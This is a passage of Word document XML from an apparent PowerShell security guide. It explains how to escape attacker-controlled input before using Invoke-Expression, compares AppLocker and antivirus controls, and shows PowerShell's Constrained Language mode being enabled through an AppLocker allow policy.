          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>EscapeBlockCommentContent       Method     static string EscapeBlockCommentContent(string value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>EscapeFormatStringContent       Method     static string EscapeFormatStringContent(string value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>EscapeSingleQuotedStringContent Method     static string EscapeSingleQuotedStringContent(string value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>EscapeVariableName              Method     static string EscapeVariableName(string value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F4F" w:rsidRDefault="00C422EB" w:rsidP="001B7BE1">
      <w:r>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidR="00DE7343">
        <w:t xml:space="preserve"> you are placing attacker-controlled input within a string (i.e.: for a command argument), ensure that you place it within a single-quoted string. Then, use </w:t>
      </w:r>
      <w:r w:rsidR="00DE7343" w:rsidRPr="000E3A62">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EscapeSingleQuotedStringContent</w:t>
      </w:r>
      <w:r w:rsidR="00DE7343">
        <w:t xml:space="preserve"> on the content itself. </w:t>
      </w:r>
      <w:r w:rsidR="00C77F4F">
        <w:t>This ensures that single quotes (or their equivalents</w:t>
      </w:r>
      <w:r w:rsidR="00D9661D">
        <w:t xml:space="preserve"> – for there are several</w:t>
      </w:r>
      <w:r w:rsidR="00C77F4F">
        <w:t>) in the attacker input are escaped properly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00681C50" w:rsidRDefault="00DE7343" w:rsidP="001B7BE1">
      <w:r>
        <w:t>For example:</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$attackerInput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"Hello'World"</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$escapedAttackerInput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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</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8080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Management.Automation.Language.CodeGeneration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]::</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EscapeSingleQuotedStringContent(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$attackerInput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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$newScript</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 xml:space="preserve">"Write-Host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$escapedAttackerInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C527C" w:rsidRDefault="007C527C" w:rsidP="007C527C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$newScript </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE7343" w:rsidRDefault="00DB6A64" w:rsidP="001B7BE1">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Safe escaping of content to be included within block comments, format strings, </w:t>
      </w:r>
      <w:r w:rsidR="002A134C">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:t>variable names is also supported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D400F" w:rsidRDefault="005D400F" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Constrained PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30DB3" w:rsidRDefault="002F1036" w:rsidP="001B7BE1">
      <w:r>
        <w:t>When a system is sensitive, one of the most powerful ways to limit the damage an attack can have is to reduce the capabilities of that attack.</w:t>
      </w:r>
      <w:r w:rsidR="00973094">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30DB3">
        <w:t xml:space="preserve">Windows’ security controls come in many forms – creating a </w:t>
      </w:r>
      <w:r w:rsidR="00973094">
        <w:t>hierarchy of protections that incrementally add value.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1611"/>
        <w:gridCol w:w="2523"/>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="2871"/>
      </w:tblGrid>
      <w:tr w:rsidR="002177C2" w:rsidRPr="002177C2" w:rsidTr="002177C2">
        <w:trPr>
          <w:trHeight w:val="495"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862"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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350"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Benefit</w:t>
            </w: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Impact Without Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1537"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Limitations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002177C2" w:rsidRPr="002177C2" w:rsidTr="002177C2">
        <w:trPr>
          <w:trHeight w:val="2025"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862" w:type="pc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Antivirus / Antimalware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350"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limit the execution of malware known to the AV industry.</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Attacker can write and run any code, custom C++ applications, internet tools, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1537"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be disabled by administrators. AV signatures can be evaded if the attacker is capable of recompiling or modifying an application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002177C2" w:rsidRPr="002177C2" w:rsidTr="002177C2">
        <w:trPr>
          <w:trHeight w:val="2025"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862"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t>Applocker in Deny Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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limit the execution of malware known to your organization.</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Attacker can write and run any code, custom C++ applications, etc., as long as they aren’t well known attack tools or exploits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1537"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be disabled by administrators. Only blocks known evil / undesirable malware, can be bypassed with only minor application changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002177C2" w:rsidRPr="002177C2" w:rsidTr="002177C2">
        <w:trPr>
          <w:trHeight w:val="2025"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862"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lastRenderedPageBreak/>
              <w:t>Applocker in Allow Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350"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prevent the execution of unknown / unapproved applications.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Attacker can write arbitrary custom applicatons, as long as they are not detected by AV or Applocker Deny rules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1537"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177C2" w:rsidRPr="002177C2" w:rsidRDefault="002177C2" w:rsidP="00080DBE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002177C2">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="dark1"/>
              </w:rPr>
              <w:t>Can be disabled by administrators. Attacker can still leverage in-box tools like VBScript, Office macros, HTA applications, local web pages, PowerShell, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002177C2" w:rsidRPr="002177C2" w:rsidRDefault="002177C2" w:rsidP="002177C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00864F17" w:rsidRDefault="00864F17" w:rsidP="001B7BE1"/>
    <w:p w:rsidR="003A4CA1" w:rsidRDefault="003A4CA1" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">These protections are, of course, in addition to the regular Windows user permissions model. </w:t>
      </w:r>
      <w:r w:rsidR="00916C38">
        <w:t xml:space="preserve">Applications don’t </w:t>
      </w:r>
      <w:r w:rsidR="00674F5A">
        <w:t>need to prevent users from modifying system-wide registry keys because Windows itself enforces those protections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1036" w:rsidRDefault="00280AA5" w:rsidP="001B7BE1">
      <w:r>
        <w:t>The strongest form of protecti</w:t>
      </w:r>
      <w:r w:rsidR="00DC7051">
        <w:t>on is when a system employs AppL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker in ‘Allow Mode’, where only specific </w:t>
      </w:r>
      <w:r w:rsidR="003F6AA4">
        <w:t>known applications are allowed to run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6AA4" w:rsidRDefault="00B4238A" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Prior to PowerShell version 5, a limitation of </w:t>
      </w:r>
      <w:r w:rsidR="00DC7051">
        <w:t>AppL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker’s ‘Allow Mode’ was that </w:t>
      </w:r>
      <w:r w:rsidR="006F1CD1">
        <w:t xml:space="preserve">interactive PowerShell input was not subject to this policy. </w:t>
      </w:r>
      <w:r w:rsidR="00644779">
        <w:t xml:space="preserve">While Allow Mode might prevent </w:t>
      </w:r>
      <w:r w:rsidR="007D2813">
        <w:t xml:space="preserve">unknown </w:t>
      </w:r>
      <w:r w:rsidR="00644779">
        <w:t>PowerShell scripts from running, it would not prevent the equivalent commands entered at an interactive prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00644779" w:rsidRDefault="00F741A2" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">In version 5, PowerShell now </w:t>
      </w:r>
      <w:r w:rsidR="005C6EEF">
        <w:t xml:space="preserve">reduces its functionality to “Constrained Mode” </w:t>
      </w:r>
      <w:r w:rsidR="00C83F87">
        <w:t xml:space="preserve">for both interactive input and user-authored scripts </w:t>
      </w:r>
      <w:r w:rsidR="005C6EEF">
        <w:t>when it detects that PowerShell scripts have an ‘Allow Mode’ policy applied to them.</w:t>
      </w:r>
      <w:r w:rsidR="003E6C0D">
        <w:t xml:space="preserve"> Constrained PowerShell limits the language mode to Constrained Language (as described in </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="003E6C0D" w:rsidRPr="003E6C0D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>about_Language_Modes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003E6C0D">
        <w:t>), a mode first introduced for Windows RT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED392A" w:rsidRDefault="00ED392A" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Constrained Language doesn’t limit the capability of the </w:t>
      </w:r>
      <w:r w:rsidR="00B06A4A">
        <w:t xml:space="preserve">core </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShell language</w:t>
      </w:r>
      <w:r w:rsidR="007F6A2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– familiar techniques such as variables, loops, and functions are all supported. </w:t>
      </w:r>
      <w:r w:rsidR="00217BAC">
        <w:t xml:space="preserve">It does, however, </w:t>
      </w:r>
      <w:r w:rsidR="0094254C">
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r w:rsidR="0022681A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="006E6A5B">
        <w:t xml:space="preserve">extended </w:t>
      </w:r>
      <w:r w:rsidR="0022681A">
        <w:t xml:space="preserve">language features that can lead to unverifiable code execution </w:t>
      </w:r>
      <w:r w:rsidR="001C5064">
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="0022681A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C17007">
        <w:t xml:space="preserve">direct </w:t>
      </w:r>
      <w:r w:rsidR="0022681A">
        <w:t xml:space="preserve">.NET scripting, invocation of Win32 APIs via the Add-Type cmdlet, and </w:t>
      </w:r>
      <w:r w:rsidR="001C40D1">
        <w:t xml:space="preserve">interaction with </w:t>
      </w:r>
      <w:r w:rsidR="000B1AAB">
        <w:t>COM objects</w:t>
      </w:r>
      <w:r w:rsidR="0022681A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7051" w:rsidRDefault="00DC7051" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Scripts that are allowed by the AppLocker policy </w:t>
      </w:r>
      <w:r w:rsidR="00DD11F5">
        <w:t>(for example: signed by the enterprise’s trusted code signing certificate</w:t>
      </w:r>
      <w:r w:rsidR="000E2EEE">
        <w:t>, or in a trusted directory</w:t>
      </w:r>
      <w:r w:rsidR="00DD11F5">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>are not s</w:t>
      </w:r>
      <w:r w:rsidR="00311443">
        <w:t>ubject to Constrained Language</w:t>
      </w:r>
      <w:r w:rsidR="0060225E">
        <w:t xml:space="preserve">. They </w:t>
      </w:r>
      <w:r w:rsidR="009C2D35">
        <w:t xml:space="preserve">have access to the </w:t>
      </w:r>
      <w:r w:rsidR="00941B13">
        <w:t>extended capabilities</w:t>
      </w:r>
      <w:r w:rsidR="009C2D35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F3431">
        <w:t>of the PowerShell language</w:t>
      </w:r>
      <w:r w:rsidR="0060225E">
        <w:t xml:space="preserve"> disallowed by Constrained Language</w:t>
      </w:r>
      <w:r w:rsidR="003C0E29">
        <w:t xml:space="preserve">. This includes unverifiable extensions such as </w:t>
      </w:r>
      <w:r w:rsidR="002E17A8">
        <w:t xml:space="preserve">.NET scripting, </w:t>
      </w:r>
      <w:r w:rsidR="003C0E29">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002E17A8">
        <w:t>invocation of Win32 APIs</w:t>
      </w:r>
      <w:r w:rsidR="00311443">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D4F2F" w:rsidRDefault="002D4F2F" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">For more information on configuring AppLocker, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00C27269">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/dd723678(v=ws.10).aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7051" w:rsidRDefault="00DC7051" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Here’s an example </w:t>
      </w:r>
      <w:r w:rsidR="002D4F2F">
        <w:t xml:space="preserve">PowerShell command </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00DE37C6">
        <w:t>lets you experiment with AppLocker in</w:t>
      </w:r>
      <w:r w:rsidR="002D4F2F">
        <w:t xml:space="preserve"> ‘Allow Mode’ for all scripts (i.e.: blocking all VBScripts, batch files, and PowerShell scripts by default), and then allows only PowerShell scripts from </w:t>
      </w:r>
      <w:r w:rsidR="002D4F2F" w:rsidRPr="002D4F2F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\trusted</w:t>
      </w:r>
      <w:r w:rsidR="002D4F2F">
        <w:t xml:space="preserve"> to run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326141" w:rsidRDefault="00326141" w:rsidP="00326141">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PS C:\&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$whitelistApplockerPolicy</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>New-AppLockerPolicy</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-RuleType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-FileInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>"c:\trusted\*.ps1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$existingApplockerPolicy</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-AppLockerPolicy</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–Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Set-AppLockerPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$whitelistApplockerPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Windows PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>Copyright (C) 2015 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326141" w:rsidRDefault="00326141" w:rsidP="00326141">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lastRenderedPageBreak/>
        <w:t>PS C:\&gt; $executionContext.SessionState.LanguageMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>ConstrainedLanguage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326141" w:rsidRDefault="00326141" w:rsidP="00326141">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PS C:\&gt; [Math]::Sqrt([Math]::Pi)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
